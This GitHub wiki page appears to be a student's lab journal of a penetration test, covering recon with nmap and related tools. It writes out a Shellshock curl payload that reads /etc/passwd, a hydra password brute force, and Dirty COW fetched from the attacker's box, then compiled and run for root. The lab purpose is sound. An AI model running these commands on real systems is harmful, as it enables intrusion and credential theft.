Exploit Basics - 5huckle/OFFICIALTECHJOURNAL GitHub Wiki

RECON (INFORMATION GATHERING)

Tools at your disposal

  • nmap (can scan for a number of things, including open ports, live hosts and the services being run; see Host Discovery for more)
  • ping (can test whether hosts are alive and whether ICMP is permitted, as well as show a potential network route)
  • internet (look up exploits, troubleshoot, cross-reference, etc.)
  • dirb (DIRB is a web content scanner. It looks for existing and/or hidden web objects by launching a dictionary-based attack against a web server and analyzing the responses)
  • cewl (generates wordlists based on the content of websites)

Gather Information about your target

This can be done with the tools listed above, but there are many more tools available. Nmap is a very versatile program.

Make sure to record any and all information found. If a host responds to ping, record it. If you do an nmap scan, write the output to a file and keep it. The more information (within reason), the merrier.

Formatting

nmaptocsv is a good tool for formatting saved nmap output (-i is the input file, -d the delimiter):

nmaptocsv -i file.txt -d ','
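The same conversion done by hand, as an added example that is not from the original journal or from the nmaptocsv project: a small parser that turns nmap's grepable (-oG) output into CSV rows so scan results can be recorded and filtered. The scan lines below are a constructed sample, not real output.

```python
import csv
import io

# Constructed sample of nmap grepable (-oG) output; not a real scan.
# Each Ports entry is port/state/proto/owner/service/rpc/version/
SAMPLE_GNMAP = """\
# Nmap 7.80 scan initiated as: nmap -sV -oG scan.gnmap 10.0.5.0/24
Host: 10.0.5.23 ()\tStatus: Up
Host: 10.0.5.23 ()\tPorts: 22/open/tcp//ssh//OpenSSH 7.2p2 Ubuntu/, 80/open/tcp//http//Apache httpd 2.4.18/, 443/closed/tcp//https///\tIgnored State: closed (997)
Host: 10.0.5.40 ()\tStatus: Up
Host: 10.0.5.40 ()\tPorts: 3306/filtered/tcp//mysql///\tIgnored State: closed (999)
# Nmap done at some time -- 2 IP addresses (2 hosts up) scanned
"""

FIELDS = ["host", "port", "state", "proto", "service", "version"]


def parse_gnmap(text):
    """Return one dict per port entry found in grepable nmap output."""
    rows = []
    for line in text.splitlines():
        # Only "Host:" lines carrying a Ports field describe scanned ports.
        if not line.startswith("Host:") or "Ports:" not in line:
            continue
        host = line.split()[1]
        # The Ports field ends at the next tab-separated field.
        ports_field = line.split("Ports:", 1)[1].split("\t", 1)[0]
        for entry in ports_field.split(","):
            parts = entry.strip().split("/")
            if len(parts) < 7:
                continue  # malformed entry; skip rather than guess
            rows.append({
                "host": host, "port": int(parts[0]), "state": parts[1],
                "proto": parts[2], "service": parts[4], "version": parts[6],
            })
    return rows


def to_csv(rows, delimiter=","):
    """Serialize parsed rows as CSV text, like nmaptocsv -d would."""
    buf = io.StringIO()
    writer = csv.DictWriter(buf, fieldnames=FIELDS, delimiter=delimiter)
    writer.writeheader()
    writer.writerows(rows)
    return buf.getvalue()


def open_ports(rows):
    """(host, port) pairs that were actually open, for the recon record."""
    return [(r["host"], r["port"]) for r in rows if r["state"] == "open"]


if __name__ == "__main__":
    print(to_csv(parse_gnmap(SAMPLE_GNMAP)))
```

Running it with `-d ';'`-style output is just `to_csv(rows, ";")`; feed it a real `scan.gnmap` file's contents instead of the sample to convert your own results.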

Access target system

I used SSH this time. I used nmap to scan for open ports; the only two open were 22 and 80 (ssh and http). Using http, I was able to access the target web server and coax it into giving me the contents of /etc/passwd using this command:

"curl -H 'User-Agent: () { :; }; echo ; echo ; /bin/cat /etc/passwd-' bash -s :'' http://10.0.5.23/cgi-bin/status"

Once I had the user account, I used grep to single out possible passwords from rockyou.txt and write them into a new file, which I passed to hydra together with the username I had found to attempt to find the correct password. After hydra returned a match for the correct password, I used it to log in and it worked.

Elevating to root with no permissions

Once I accessed the target account on the target box, I did not have any permissions or authentication. I could not even use sudo despite knowing the password. My workaround was to use my home box, which I was SSHing from, to download an exploit called dirtycow that would allow me to gain root access. Here is how I downloaded it:

wget https://raw.githubusercontent.com/firefart/dirtycow/master/dirty.c

I then hosted a Python HTTP server:

python -m http.server 80

and used the target box to fetch the file from this http.server, using my home box's VPN IP as the server IP, so I could download the exploit:

wget http://10.0.99.35/dirtycow.c

I compiled it on the target box:

gcc -pthread dirty.c -o dirty -lcrypt

I gave it execute permissions:

chmod +x dirty

Then I ran dirty:

./dirty

And I was done. Here is the guide I used: https://bond-o.medium.com/dirty-cow-2c79cd6859c9